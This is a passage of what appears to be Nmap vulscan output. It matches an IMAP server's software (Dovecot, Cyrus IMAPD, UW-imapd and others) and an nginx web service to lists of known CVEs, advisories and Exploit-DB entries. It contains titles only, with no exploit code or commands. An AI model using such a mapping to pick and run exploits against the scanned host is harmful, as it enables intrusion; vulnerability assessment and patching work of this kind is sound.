12044| [CVE-2007-1578] Multiple integer signedness errors in the NTLM implementation in Atrium MERCUR IMAPD (mcrimap4.exe) 5.00.14, with SP4, allow remote attackers to execute arbitrary code via a long NTLMSSP argument that triggers a stack-based buffer overflow.
12045| [CVE-2007-0618] Unspecified vulnerability in (1) pop3d, (2) pop3ds, (3) imapd, and (4) imapds in IBM AIX 5.3.0 has unspecified impact and attack vectors, involving an "authentication vulnerability."
12046| [CVE-2006-6762] The IMAP daemon (IMAPD) in Novell NetMail before 3.52e FTF2 allows remote authenticated users to cause a denial of service via an APPEND command with a single "(" (parenthesis) in the argument.
12047| [CVE-2006-6761] Stack-based buffer overflow in the IMAP daemon (IMAPD) in Novell NetMail before 3.52e FTF2 allows remote authenticated users to execute arbitrary code via a long argument to the SUBSCRIBE command.
12048| [CVE-2006-6425] Stack-based buffer overflow in the IMAP daemon (IMAPD) in Novell NetMail before 3.52e FTF2 allows remote authenticated users to execute arbitrary code via unspecified vectors involving the APPEND command.
12049| [CVE-2006-6424] Multiple buffer overflows in Novell NetMail before 3.52e FTF2 allow remote attackers to execute arbitrary code (1) by appending literals to certain IMAP verbs when specifying command continuation requests to IMAPD, resulting in a heap overflow
12050| [CVE-2006-5973] Off-by-one buffer overflow in Dovecot 1.0test53 through 1.0.rc14, and possibly other versions, when index files are used and mmap_disable is set to "yes," allows remote authenticated IMAP or POP3 users to cause a denial of service (crash) via unspecified vectors involving the cache file.
12051| [CVE-2006-2502] Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
12052| [CVE-2006-2414] Directory traversal vulnerability in Dovecot 1.0 beta and 1.0 allows remote attackers to list files and directories under the mbox parent directory and obtain mailbox names via ".." sequences in the (1) LIST or (2) DELETE IMAP command.
12053| [CVE-2006-0730] Multiple unspecified vulnerabilities in Dovecot before 1.0beta3 allow remote attackers to cause a denial of service (application crash or hang) via unspecified vectors involving (1) "potential hangs" in the APPEND command and "potential crashes" in (2) dovecot-auth and (3) imap/pop3-login. NOTE: vector 2 might be related to a double free vulnerability.
12054| [CVE-2005-2278] Stack-based buffer overflow in the IMAP daemon (imapd) in MailEnable Professional 1.54 allows remote authenticated users to execute arbitrary code via the status command with a long mailbox name.
12055| [CVE-2005-1256] Stack-based buffer overflow in the IMAP daemon (IMAPD32.EXE) in IMail 8.13 in Ipswitch Collaboration Suite (ICS), and other versions before IMail Server 8.2 Hotfix 2, allows remote authenticated users to execute arbitrary code via a STATUS command with a long mailbox name.
12056| [CVE-2005-1249] The IMAP daemon (IMAPD32.EXE) in Ipswitch Collaboration Suite (ICS) allows remote attackers to cause a denial of service (CPU consumption) via an LSUB command with a large number of null characters, which causes an infinite loop.
12057| [CVE-2005-1015] Buffer overflow in MailEnable Imapd (MEIMAP.exe) allows remote attackers to execute arbitrary code via a long LOGIN command.
12058| [CVE-2005-0546] Multiple buffer overflows in Cyrus IMAPd before 2.2.11 may allow attackers to execute arbitrary code via (1) an off-by-one error in the imapd annotate extension, (2) an off-by-one error in "cached header handling," (3) a stack-based buffer overflow in fetchnews, or (4) a stack-based buffer overflow in imapd.
12059| [CVE-2003-1322] Multiple stack-based buffer overflows in Atrium MERCUR IMAPD in MERCUR Mailserver before 4.2.15.0 allow remote attackers to execute arbitrary code via a long (1) EXAMINE, (2) DELETE, (3) SUBSCRIBE, (4) RENAME, (5) UNSUBSCRIBE, (6) LIST, (7) LSUB, (8) STATUS, (9) LOGIN, (10) CREATE, or (11) SELECT command.
12060| [CVE-2002-1782] The default configuration of University of Washington IMAP daemon (wu-imapd), when running on a system that does not allow shell access, allows a local user with a valid IMAP account to read arbitrary files as that user.
12061| [CVE-2002-1604] Multiple buffer overflows in HP Tru64 UNIX allow local and possibly remote attackers to execute arbitrary code via a long NLSPATH environment variable to (1) csh, (2) dtsession, (3) dxsysinfo, (4) imapd, (5) inc, (6) uucp, (7) uux, (8) rdist, or (9) deliver.
12062| [CVE-2002-0997] Buffer overflows in IMAP Agent (imapd) for Novell NetMail (NIMS) 3.0.3 before 3.0.3A allows remote attackers to cause a denial of service.
12063| [CVE-2002-0379] Buffer overflow in University of Washington imap server (uw-imapd) imap-2001 (imapd 2001.315) and imap-2001a (imapd 2001.315) with legacy RFC 1730 support, and imapd 2000.287 and earlier, allows remote authenticated users to execute arbitrary code via a long BODY request.
12064| [CVE-2001-0691] Buffer overflows in Washington University imapd 2000a through 2000c could allow local users without shell access to execute code as themselves in certain configurations.
12065| [CVE-2000-0284] Buffer overflow in University of Washington imapd version 4.7 allows users with a valid account to execute commands via LIST or other commands.
12066| [CVE-1999-1557] Buffer overflow in the login functions in IMAP server (imapd) in Ipswitch IMail 5.0 and earlier allows remote attackers to cause a denial of service and possibly execute arbitrary code via (1) a long user name or (2) a long password.
12067| [CVE-1999-1445] Vulnerability in imapd and ipop3d in Slackware 3.4 and 3.3 with shadowing enabled, and possibly other operating systems, allows remote attackers to cause a core dump via a short sequence of USER and PASS commands that do not provide valid usernames or passwords.
12068| [CVE-1999-1224] IMAP 4.1 BETA, and possibly other versions, does not properly handle the SIGABRT (abort) signal, which allows local users to crash the server (imapd) via certain sequences of commands, which causes a core dump that may contain sensitive password information.
12069|
12070| SecurityFocus - https://www.securityfocus.com/bid/:
12071| [103201] Dovecot CVE-2017-14461 Out-Of-Bounds Read Information Disclosure Vulnerability
12072| [97536] Dovecot CVE-2017-2669 Denial of Service Vulnerability
12073| [94639] Dovecot Auth Component CVE-2016-8652 Denial of Service Vulnerability
12074| [91175] Dovecot CVE-2016-4982 Local Information Disclosure Vulnerability
12075| [84736] Dovecot CVE-2008-4870 Local Security Vulnerability
12076| [84478] imapd CVE-1999-1224 Denial-Of-Service Vulnerability
12077| [74335] Dovecot 'ssl-proxy-openssl.c' Remote Denial of Service Vulnerability
12078| [67306] Dovecot Denial of Service Vulnerability
12079| [65650] Eudora WorldMail imapd 'UID' Command Buffer Overflow Vulnerability
12080| [63367] Dovecot Checkpassword Authentication Protocol Local Authentication Bypass Vulnerability
12081| [61763] RETIRED: Dovecot 'LIST' Command Denial of Service Vulnerability
12082| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
12083| [60052] Dovecot 'APPEND' Parameter Denial of Service Vulnerability
12084| [56759] RETIRED: Dovecot 'mail-search.c' Denial of Service Vulnerability
12085| [51403] Eudora WorldMail imapd 'LIST' Command Buffer Overflow Vulnerability
12086| [50709] Dovecot SSL Certificate 'Common Name' Field Validation Security Bypass Vulnerability
12087| [49949] Cyrus IMAPd NTTP Logic Error Authentication Bypass Vulnerability
12088| [48003] Dovecot 'script-login' Multiple Security Bypass Vulnerabilities
12089| [47930] Dovecot Header Name NULL Character Denial of Service Vulnerability
12090| [44874] Apple Mac OS X Dovecot (CVE-2010-4011) Memory Corruption Vulnerability
12091| [43690] Dovecot Access Control List (ACL) Multiple Remote Vulnerabilities
12092| [41964] Dovecot Access Control List (ACL) Plugin Security Bypass Weakness
12093| [39258] Dovecot Service Control Access List Security Bypass Vulnerability
12094| [37084] Dovecot Insecure 'base_dir' Permissions Local Privilege Escalation Vulnerability
12095| [36377] Dovecot Sieve Plugin Multiple Unspecified Buffer Overflow Vulnerabilities
12096| [32582] Dovecot ManageSieve Service '.sieve' Files Directory Traversal Vulnerability
12097| [31997] Dovecot Invalid Message Address Parsing Denial of Service Vulnerability
12098| [31587] Dovecot ACL Plugin Multiple Security Bypass Vulnerabilities
12099| [28181] Dovecot 'Tab' Character Password Check Security Bypass Vulnerability
12100| [28092] Dovecot 'mail_extra_groups' Insecure Settings Local Unauthorized Access Vulnerability
12101| [27093] Dovecot Authentication Cache Security Bypass Vulnerability
12102| [26270] Perdition IMAPD __STR_VWRITE Remote Format String Vulnerability
12103| [25733] Mercury/32 IMAPD SEARCH Command Remote Stack Buffer Overflow Vulnerability
12104| [25182] Dovecot ACL Plugin Security Bypass Vulnerability
12105| [23552] Dovecot Zlib Plugin Remote Information Disclosure Vulnerability
12106| [23058] Atrium Mercur IMapD NTLM Buffer Overflow Vulnerability
12107| [22262] IBM AIX Pop3D/Pop3DS/IMapD/IMapDS Authentication Bypass Vulnerability
12108| [21183] Dovecot IMAP Server Mapped Pages Off-By-One Buffer Overflow Vulnerability
12109| [18056] Cyrus IMAPD POP3D Remote Buffer Overflow Vulnerability
12110| [17961] Dovecot Remote Information Disclosure Vulnerability
12111| [16672] Dovecot Double Free Denial of Service Vulnerability
12112| [15980] Qualcomm WorldMail IMAPD Buffer Overflow Vulnerability
12113| [15753] Ipswitch Collaboration Suite and IMail Server IMAPD LIST Command Denial Of Service Vulnerability
12114| [12636] Cyrus IMAPD Multiple Remote Buffer Overflow Vulnerabilities
12115| [11738] Cyrus IMAPD Multiple Remote Unspecified Vulnerabilities
12116| [11729] Cyrus IMAPD Multiple Remote Vulnerabilities
12117| [6298] Cyrus IMAPD Pre-Login Heap Corruption Vulnerability
12118| [4713] Wu-imapd Partial Mailbox Attribute Remote Buffer Overflow Vulnerability
12119| [2856] Imapd 'Local' Buffer Overflow Vulnerabilities
12120| [1110] Univ. Of Washington imapd Buffer Overflow Vulnerabilities
12121| [502] NT IMail Imapd Buffer Overflow DoS Vulnerability
12122| [130] imapd Buffer Overflow Vulnerability
12123|
12124| IBM X-Force - https://exchange.xforce.ibmcloud.com:
12125| [86382] Dovecot POP3 Service denial of service
12126| [84396] Dovecot IMAP APPEND denial of service
12127| [80453] Dovecot mail-search.c denial of service
12128| [71354] Dovecot SSL Common Name (CN) weak security
12129| [70325] Cyrus IMAPd NNTP security bypass
12130| [67675] Dovecot script-login security bypass
12131| [67674] Dovecot script-login directory traversal
12132| [67589] Dovecot header name denial of service
12133| [63267] Apple Mac OS X Dovecot information disclosure
12134| [62340] Dovecot mailbox security bypass
12135| [62339] Dovecot IMAP or POP3 denial of service
12136| [62256] Dovecot mailbox security bypass
12137| [62255] Dovecot ACL entry security bypass
12138| [60639] Dovecot ACL plugin weak security
12139| [57267] Apple Mac OS X Dovecot Kerberos security bypass
12140| [56763] Dovecot header denial of service
12141| [54363] Dovecot base_dir privilege escalation
12142| [53248] CMU Sieve plugin for Dovecot unspecified buffer overflow
12143| [47526] UW-imapd rfc822_output_char() denial of service
12144| [46323] Dovecot dovecot.conf information disclosure
12145| [46227] Dovecot message parsing denial of service
12146| [45669] Dovecot ACL mailbox security bypass
12147| [45667] Dovecot ACL plugin rights security bypass
12148| [41085] Dovecot TAB characters authentication bypass
12149| [41009] Dovecot mail_extra_groups option unauthorized access
12150| [39342] Dovecot LDAP auth cache configuration security bypass
12151| [35767] Dovecot ACL plugin security bypass
12152| [34082] Dovecot mbox-storage.c directory traversal
12153| [30433] Dovecot IMAP/POP3 server dovecot.index.cache buffer overflow
12154| [26536] Dovecot IMAP LIST information disclosure
12155| [24710] Dovecot dovecot-auth and imap/pop3-login denial of service
12156| [24709] Dovecot APPEND command denial of service
12157| [22629] RHSA-2005:408 updates for cyrus-imapd not installed
12158| [19460] Cyrus IMAP imapd buffer overflow
12159| [19455] Cyrus IMAP imapd extension off-by-one buffer overflow
12160| [18492] Novell NetMail IMAPD 101_mEna buffer overflow
12161| [10803] UW IMAP (wu-imapd) authenticated user buffer overflow
12162| [9238] UW IMAP (wu-imapd) could allow a remote attacker to access arbitrary files
12163| [9055] UW IMAP (wu-imapd) partial mailbox attributes to request buffer overflow
12164| [7345] Slackware Linux imapd and ipop3d core dump
12165| [573] Imapd denial of service
12166|
12167| Exploit-DB - https://www.exploit-db.com:
12168| [30724] Perdition 1.17 IMAPD __STR_VWRITE Remote Format String Vulnerability
12169| [25297] Dovecot with Exim sender_address Parameter - Remote Command Execution
12170| [22061] Cyrus IMAPD 1.4/1.5.19/2.0.12/2.0.16/2.1.9/2.1.10 Pre-Login Heap Corruption Vulnerability
12171| [21443] Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability (2)
12172| [21442] Wu-imapd 2000/2001 Partial Mailbox Attribute Remote Buffer Overflow Vulnerability (1)
12173| [19849] UoW imapd 10.234/12.264 COPY Buffer Overflow (meta)
12174| [19848] UoW imapd 10.234/12.264 LSUB Buffer Overflow (meta)
12175| [19847] UoW imapd 10.234/12.264 Buffer Overflow Vulnerabilities
12176| [19377] Ipswitch IMail 5.0 Imapd Buffer Overflow DoS Vulnerability
12177| [19107] Netscape Messaging Server 3.55,University of Washington imapd 10.234 Buffer Overflow Vulnerability
12178| [18354] WorldMail imapd 3.0 SEH overflow (egg hunter)
12179| [16836] Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
12180| [16485] MailEnable IMAPD 1.54 - STATUS Request Buffer Overflow
12181| [16482] MDaemon 9.6.4 IMAPD FETCH Buffer Overflow
12182| [16480] MailEnable IMAPD W3C Logging Buffer Overflow
12183| [16477] Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow
12184| [16475] MailEnable IMAPD (2.35) Login Request Buffer Overflow
12185| [16474] Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow
12186| [5257] Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit
12187| [4429] Mercury/32 4.52 IMAPD SEARCH command Post-Auth Overflow Exploit
12188| [3627] IPSwitch IMail Server <= 8.20 IMAPD Remote Buffer Overflow Exploit
12189| [3527] Mercur IMAPD 5.00.14 Remote Denial of Service Exploit (win32)
12190| [2185] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)
12191| [2053] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)
12192| [1813] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit
12193| [1380] Eudora Qualcomm WorldMail 3.0 (IMAPd) Remote Overflow Exploit
12194| [1332] MailEnable 1.54 Pro Universal IMAPD W3C Logging BoF Exploit
12195| [1327] FTGate4 Groupware Mail Server 4.1 (imapd) Remote Buffer Overflow PoC
12196| [1151] MDaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow Exploit
12197| [1124] IPSwitch IMail Server <= 8.15 IMAPD Remote Root Exploit
12198| [915] MailEnable Enterprise 1.x Imapd Remote Exploit
12199| [903] Cyrus imapd 2.2.4 - 2.2.8 (imapmagicplus) Remote Exploit
12200| [340] Linux imapd Remote Overflow File Retrieve Exploit
12201|
12202| OpenVAS (Nessus) - http://www.openvas.org:
12203| [901026] Dovecot Sieve Plugin Multiple Buffer Overflow Vulnerabilities
12204| [901025] Dovecot Version Detection
12205| [881425] CentOS Update for cyrus-imapd CESA-2011:1508 centos5 x86_64
12206| [881403] CentOS Update for cyrus-imapd CESA-2011:0859 centos5 x86_64
12207| [881402] CentOS Update for dovecot CESA-2011:1187 centos5 x86_64
12208| [881397] CentOS Update for cyrus-imapd CESA-2011:1317 centos4 x86_64
12209| [881370] CentOS Update for cyrus-imapd CESA-2011:1508 centos4 x86_64
12210| [881358] CentOS Update for dovecot CESA-2011:1187 centos4 x86_64
12211| [881318] CentOS Update for cyrus-imapd CESA-2011:0859 centos4 x86_64
12212| [881255] CentOS Update for cyrus-imapd CESA-2011:1317 centos5 x86_64
12213| [881050] CentOS Update for cyrus-imapd CESA-2011:1508 centos5 i386
12214| [881049] CentOS Update for cyrus-imapd CESA-2011:1508 centos4 i386
12215| [881007] CentOS Update for cyrus-imapd CESA-2011:1317 centos5 i386
12216| [880980] CentOS Update for dovecot CESA-2011:1187 centos5 i386
12217| [880978] CentOS Update for cyrus-imapd CESA-2011:1317 centos4 i386
12218| [880967] CentOS Update for dovecot CESA-2011:1187 centos4 i386
12219| [880958] CentOS Update for cyrus-imapd CESA-2011:0859 centos4 i386
12220| [880905] CentOS Update for cyrus-imapd CESA-2009:1459 centos4 i386
12221| [880864] CentOS Update for cyrus-imapd CESA-2009:1459 centos5 i386
12222| [880826] CentOS Update for cyrus-imapd CESA-2009:1116 centos5 i386
12223| [880536] CentOS Update for cyrus-imapd CESA-2011:0859 centos5 i386
12224| [870607] RedHat Update for dovecot RHSA-2011:0600-01
12225| [870520] RedHat Update for cyrus-imapd RHSA-2011:1508-01
12226| [870489] RedHat Update for cyrus-imapd RHSA-2011:1317-01
12227| [870471] RedHat Update for dovecot RHSA-2011:1187-01
12228| [870443] RedHat Update for cyrus-imapd RHSA-2011:0859-01
12229| [870153] RedHat Update for dovecot RHSA-2008:0297-02
12230| [864075] Fedora Update for cyrus-imapd FEDORA-2011-13832
12231| [863585] Fedora Update for cyrus-imapd FEDORA-2011-13869
12232| [863579] Fedora Update for cyrus-imapd FEDORA-2011-13860
12233| [863281] Fedora Update for cyrus-imapd FEDORA-2011-7193
12234| [863273] Fedora Update for cyrus-imapd FEDORA-2011-7217
12235| [863272] Fedora Update for dovecot FEDORA-2011-7612
12236| [863115] Fedora Update for dovecot FEDORA-2011-7258
12237| [861525] Fedora Update for dovecot FEDORA-2007-664
12238| [861394] Fedora Update for dovecot FEDORA-2007-493
12239| [861333] Fedora Update for dovecot FEDORA-2007-1485
12240| [860845] Fedora Update for dovecot FEDORA-2008-9202
12241| [860663] Fedora Update for dovecot FEDORA-2008-2475
12242| [860169] Fedora Update for dovecot FEDORA-2008-2464
12243| [860089] Fedora Update for dovecot FEDORA-2008-9232
12244| [840950] Ubuntu Update for dovecot USN-1295-1
12245| [840668] Ubuntu Update for dovecot USN-1143-1
12246| [840583] Ubuntu Update for dovecot vulnerabilities USN-1059-1
12247| [840335] Ubuntu Update for dovecot vulnerabilities USN-593-1
12248| [840290] Ubuntu Update for dovecot vulnerability USN-567-1
12249| [840234] Ubuntu Update for dovecot vulnerability USN-666-1
12250| [840072] Ubuntu Update for dovecot vulnerability USN-487-1
12251| [831590] Mandriva Update for cyrus-imapd MDVSA-2012:037 (cyrus-imapd)
12252| [831468] Mandriva Update for cyrus-imapd MDVSA-2011:149 (cyrus-imapd)
12253| [831410] Mandriva Update for cyrus-imapd MDVSA-2011:100 (cyrus-imapd)
12254| [831405] Mandriva Update for dovecot MDVSA-2011:101 (dovecot)
12255| [831230] Mandriva Update for dovecot MDVSA-2010:217 (dovecot)
12256| [831207] Mandriva Update for cyrus-imapd MDVA-2010:208 (cyrus-imapd)
12257| [831197] Mandriva Update for dovecot MDVSA-2010:196 (dovecot)
12258| [831054] Mandriva Update for dovecot MDVSA-2010:104 (dovecot)
12259| [830496] Mandriva Update for dovecot MDVSA-2008:232 (dovecot)
12260| [801055] Dovecot 'base_dir' Insecure Permissions Security Bypass Vulnerability
12261| [800149] UW-imapd tmail and dmail BOF Vulnerabilities (Linux)
12262| [800030] Dovecot ACL Plugin Security Bypass Vulnerabilities
12263| [70767] Gentoo Security Advisory GLSA 201110-04 (Dovecot)
12264| [70696] Debian Security Advisory DSA 2377-1 (cyrus-imapd-2.2)
12265| [70407] Debian Security Advisory DSA 2318-1 (cyrus-imapd-2.2)
12266| [70259] FreeBSD Ports: dovecot
12267| [69965] Debian Security Advisory DSA 2258-1 (kolab-cyrus-imapd)
12268| [69959] Debian Security Advisory DSA 2252-1 (dovecot)
12269| [69740] Debian Security Advisory DSA 2242-1 (cyrus-imapd-2.2)
12270| [66522] FreeBSD Ports: dovecot
12271| [66416] Mandriva Security Advisory MDVSA-2009:229-1 (cyrus-imapd)
12272| [66233] SLES10: Security update for Cyrus IMAPD
12273| [66226] SLES11: Security update for Cyrus IMAPD
12274| [66222] SLES9: Security update for Cyrus IMAPD
12275| [65938] SLES10: Security update for Cyrus IMAPD
12276| [65723] SLES11: Security update for Cyrus IMAPD
12277| [65523] SLES9: Security update for Cyrus IMAPD
12278| [65479] SLES9: Security update for cyrus-imapd
12279| [65094] SLES9: Security update for cyrus-imapd
12280| [65010] Ubuntu USN-838-1 (dovecot)
12281| [64989] CentOS Security Advisory CESA-2009:1459 (cyrus-imapd)
12282| [64978] Debian Security Advisory DSA 1892-1 (dovecot)
12283| [64977] Debian Security Advisory DSA 1893-1 (cyrus-imapd-2.2 kolab-cyrus-imapd)
12284| [64965] Fedora Core 11 FEDORA-2009-9901 (cyrus-imapd)
12285| [64963] Fedora Core 10 FEDORA-2009-9869 (cyrus-imapd)
12286| [64953] Mandrake Security Advisory MDVSA-2009:242-1 (dovecot)
12287| [64952] Mandrake Security Advisory MDVSA-2009:242 (dovecot)
12288| [64898] FreeBSD Ports: cyrus-imapd
12289| [64864] Debian Security Advisory DSA 1881-1 (cyrus-imapd-2.2)
12290| [64861] Fedora Core 10 FEDORA-2009-9559 (dovecot)
12291| [64847] Fedora Core 10 FEDORA-2009-9428 (cyrus-imapd)
12292| [64846] Fedora Core 11 FEDORA-2009-9417 (cyrus-imapd)
12293| [64838] Mandrake Security Advisory MDVSA-2009:229 (cyrus-imapd)
12294| [64271] CentOS Security Advisory CESA-2009:1116 (cyrus-imapd)
12295| [62965] Gentoo Security Advisory GLSA 200812-16 (dovecot)
12296| [62854] FreeBSD Ports: dovecot-managesieve
12297| [61916] FreeBSD Ports: dovecot
12298| [60588] Gentoo Security Advisory GLSA 200803-25 (dovecot)
12299| [60568] Debian Security Advisory DSA 1516-1 (dovecot)
12300| [60528] FreeBSD Ports: dovecot
12301| [60134] Debian Security Advisory DSA 1457-1 (dovecot)
12302| [60089] FreeBSD Ports: dovecot
12303| [58578] Debian Security Advisory DSA 1359-1 (dovecot)
12304| [56834] Debian Security Advisory DSA 1080-1 (dovecot)
12305| [55807] Slackware Advisory SSA:2005-310-06 imapd
12306| [54861] Gentoo Security Advisory GLSA 200502-29 (cyrus-imapd)
12307| [54755] Gentoo Security Advisory GLSA 200411-34 (cyrus-imapd)
12308| [53739] Debian Security Advisory DSA 215-1 (cyrus-imapd)
12309| [53288] Debian Security Advisory DSA 597-1 (cyrus-imapd)
12310| [52297] FreeBSD Ports: cyrus-imapd
12311| [52296] FreeBSD Ports: cyrus-imapd
12312| [52295] FreeBSD Ports: cyrus-imapd
12313| [52294] FreeBSD Ports: cyrus-imapd
12314| [52172] FreeBSD Ports: cyrus-imapd
12315|
12316| SecurityTracker - https://www.securitytracker.com:
12317| [1028585] Dovecot APPEND Parameter Processing Flaw Lets Remote Authenticated Users Deny Service
12318| [1024740] Mac OS X Server Dovecot Memory Aliasing Bug May Cause Mail to Be Delivered to the Wrong User
12319| [1017288] Dovecot POP3/IMAP Cache File Buffer Overflow May Let Remote Users Execute Arbitrary Code
12320| [1013278] Cyrus IMAPd Buffer Overflows in Annotate Extension, Cached Header, and Fetchnews May Let Remote Users Execute Arbitrary Code
12321|
12322| OSVDB - http://www.osvdb.org:
12323| [96172] Dovecot POP3 Service Terminated LIST Command Remote DoS
12324| [93525] Dovecot IMAP APPEND Command Malformed Parameter Parsing Remote DoS
12325| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
12326| [88058] Dovecot lib-storage/mail-search.c Multiple Keyword Search Handling Remote DoS
12327| [78304] Eudora WorldMail imapd SEH LIST Command Parsing Remote Overflow
12328| [77185] Dovecot SSL Certificate Common Name Field MitM Spoofing Weakness
12329| [75445] Cyrus IMAP Server imapd index.c index_get_ids Function References Header NULL Dereference Remote DoS
12330| [74515] Dovecot script-login chroot Configuration Setting Traversal Arbitrary File Access
12331| [74514] Dovecot script-login User / Group Configuration Settings Remote Access Restriction Bypass
12332| [72495] Dovecot lib-mail/message-header-parser.c Mail Header Name NULL Character Handling Remote DoS
12333| [69260] Apple Mac OS X Server Dovecot Memory Aliasing Mail Delivery Issue
12334| [68516] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition User Private Namespace Mailbox Access Restriction Remote Bypass
12335| [68515] Dovecot plugins/acl/acl-backend-vfile.c ACL Permission Addition Specific Entry Order Mailbox Access Restriction Remote Bypass
12336| [68513] Dovecot Non-public Namespace Mailbox ACL Manipulation Access Restriction Remote Bypass
12337| [68512] Dovecot IMAP / POP3 Session Disconnect Master Process Outage Remote DoS
12338| [66625] Dovecot ACL Plugin INBOX ACL Copying Weakness Restriction Bypass
12339| [66113] Dovecot Mail Root Directory Creation Permission Weakness
12340| [66112] Dovecot Installation base_dir Parent Directory Permission Weakness
12341| [66111] Dovecot SEARCH Functionality str_find_init() Function Overflow
12342| [66110] Dovecot Multiple Unspecified Buffer Overflows
12343| [66108] Dovecot Malformed Message Body Processing Unspecified Functions Remote DoS
12344| [64783] Dovecot E-mail Message Header Unspecified DoS
12345| [63372] Apple Mac OS X Dovecot Kerberos Authentication SACL Restriction Bypass
12346| [62796] Dovecot mbox Format Email Header Handling DoS
12347| [60316] Dovecot base_dir Directory Permission Weakness Local Privilege Escalation
12348| [58103] Dovecot CMU Sieve Plugin Script Handling Multiple Overflows
12349| [57843] Cyrus IMAP Server (cyrus-imapd) SIEVE Script Component (sieve/script.c) Crafted Script Handling Overflow
12350| [57681] UoW imap Server (uw-imapd) Arbitrary Remote File Access
12351| [52906] UW-imapd c-client Initial Request Remote Format String
12352| [52905] UW-imapd c-client Library RFC822BUFFER Routines rfc822_output_char Function Off-by-one
12353| [52456] UW-imapd on Debian Linux LOGIN Command Remote DoS
12354| [50253] Dovecot dovecot.conf Permission Weakness Local ssl_key_password Parameter Disclosure
12355| [49918] Dovecot ManageSieve Script Name Handling Traversal Arbitrary File Manipulation
12356| [49485] UW-imapd dmail Utility Mailbox Name Handling Overflow
12357| [49484] UW-imapd tmail Utility Mailbox Name Handling Overflow
12358| [49429] Dovecot Message Parsing Feature Crafted Email Header Handling Remote DoS
12359| [49099] Dovecot ACL Plugin k Right Mailbox Creation Restriction Bypass
12360| [49098] Dovecot ACL Plugin Negative Access Rights Bypass
12361| [43137] Dovecot mail_extra_groups Symlink File Manipulation
12362| [42979] Dovecot passdbs Argument Injection Authentication Bypass
12363| [42004] Perdition Mail Retrieval Proxy IMAPD IMAP Tag Remote Format String Arbitrary Code Execution
12364| [39876] Dovecot LDAP Auth Cache Security Bypass
12365| [39670] Mercury Mail Transport System IMAPD SEARCH Command Remote Overflow
12366| [39386] Dovecot ACL Plugin Insert Right APPEND / COPY Command Unauthorized Flag Manipulation
12367| [35489] Dovecot index/mbox/mbox-storage.c Traversal Arbitrary Gzip File Access
12368| [31362] Novell NetMail IMAP Daemon (IMAPD) APPEND Command Remote Overflow
12369| [31361] Novell NetMail IMAP Daemon (IMAPD) APPEND Command DoS
12370| [31360] Novell NetMail IMAP Daemon (IMAPD) SUBSCRIBE Command Remote Overflow
12371| [30524] Dovecot IMAP/POP3 Server dovecot.index.cache Handling Overflow
12372| [25853] Cyrus IMAPD pop3d USER Command Remote Overflow
12373| [25727] Dovecot Multiple Command Traversal Arbitrary Directory Listing
12374| [23281] Dovecot imap/pop3-login dovecot-auth DoS
12375| [23280] Dovecot Malformed APPEND Command DoS
12376| [18179] HP Tru64 UNIX imapd NLSPATH Environment Variable Local Overflow
12377| [13242] UW-imapd CRAM-MD5 Authentication Bypass
12378| [12385] Novell NetMail IMAPD 101_mEna Script Remote Overflow
12379| [12042] UoW imapd Multiple Unspecified Overflows
12380| [12037] UoW imapd (UW-IMAP) Multiple Command Remote Overflows
12381| [12033] Slackware Linux imapd/ipop3d Malformed USER/PASS Sequence DoS
12382| [911] UoW imapd AUTHENTICATE Command Remote Overflow
12383| [790] UoW imap Server (uw-imapd) BODY Request Remote Overflow
12384| [519] UoW imapd SIGABRT Signal Forced Crash Information Disclosure
12385|_
12386443/tcp open ssl/http nginx
12387| vulscan: VulDB - https://vuldb.com:
12388| [133852] Sangfor Sundray WLAN Controller up to 3.7.4.2 Cookie Header nginx_webconsole.php Code Execution
12389| [132132] SoftNAS Cloud 4.2.0/4.2.1 Nginx privilege escalation
12390| [131858] Puppet Discovery up to 1.3.x Nginx Container weak authentication
12391| [130644] Nginx Unit up to 1.7.0 Router Process Request Heap-based memory corruption
12392| [127759] VeryNginx 0.3.3 Web Application Firewall privilege escalation
12393| [126525] nginx up to 1.14.0/1.15.5 ngx_http_mp4_module Loop denial of service
12394| [126524] nginx up to 1.14.0/1.15.5 HTTP2 CPU Exhaustion denial of service
12395| [126523] nginx up to 1.14.0/1.15.5 HTTP2 Memory Consumption denial of service
12396| [119845] Pivotal Operations Manager up to 2.0.13/2.1.5 Nginx privilege escalation
12397| [114368] SuSE Portus 2.3 Nginx Certificate weak authentication
12398| [103517] nginx up to 1.13.2 Range Filter Request Integer Overflow memory corruption
12399| [89849] nginx RFC 3875 Namespace Conflict Environment Variable Open Redirect
12400| [87719] nginx up to 1.11.0 ngx_files.c ngx_chain_to_iovec denial of service
12401| [80760] nginx 0.6.18/1.9.9 DNS CNAME Record Crash denial of service
12402| [80759] nginx 0.6.18/1.9.9 DNS CNAME Record Use-After-Free denial of service
12403| [80758] nginx 0.6.18/1.9.9 DNS UDP Packet Crash denial of service
12404| [67677] nginx up to 1.7.3 SSL weak authentication
12405| [67296] nginx up to 1.7.3 SMTP Proxy ngx_mail_smtp_starttls privilege escalation
12406| [12822] nginx up to 1.5.11 SPDY SPDY Request Heap-based memory corruption
12407| [12824] nginx 1.5.10 on 32-bit SPDY memory corruption
12408| [11237] nginx up to 1.5.6 URI String Bypass privilege escalation
12409| [65364] nginx up to 1.1.13 Default Configuration information disclosure
12410| [8671] nginx up to 1.4 proxy_pass denial of service
12411| [8618] nginx 1.3.9/1.4.0 http/ngx_http_parse.c ngx_http_parse_chunked() memory corruption
12412| [7247] nginx 1.2.6 Proxy Function spoofing
12413| [61434] nginx 1.2.0/1.3.0 on Windows Access Restriction privilege escalation
12414| [5293] nginx up to 1.1.18 ngx_http_mp4_module MP4 File memory corruption
12415| [4843] nginx up to 1.0.13/1.1.16 HTTP Header Response Parser ngx_http_parse.c information disclosure
12416| [59645] nginx up to 0.8.9 Heap-based memory corruption
12417| [53592] nginx 0.8.36 memory corruption
